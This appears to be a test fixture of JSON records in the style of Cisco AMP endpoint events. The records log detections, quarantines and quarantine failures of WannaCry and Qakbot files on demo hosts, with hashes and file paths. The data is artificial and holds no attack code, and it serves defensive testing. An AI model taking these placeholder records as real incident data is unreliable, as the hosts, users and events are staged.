+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847664","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847663","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847662","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847661","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847659","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225761,"description":"Cannot delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847657","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":572000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229331435814973","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":120000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":1008,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":73000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229331435814970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":26000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814968","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229327140847660","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229327140847658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":870000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229327140847671","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":698000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847666","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":5748,"disposition":"Clean","file_name":"cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae","sha1":"ee8cbf12d87c4d388f09b4f69bed2e91682920b5","md5":"ad7b9c14083b52bc532fba5948342b98"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":667000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":4772,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":28000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419229327140847656","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229322845880000,"timestamp":1610635263,"timestamp_nanoseconds":950000000,"date":"2021-01-14T14:41:03+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411488666497056775","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411488666497056774","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411488666497056773","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056775","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qYf.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\qYf.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056774","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4191700.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\4191700.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}}
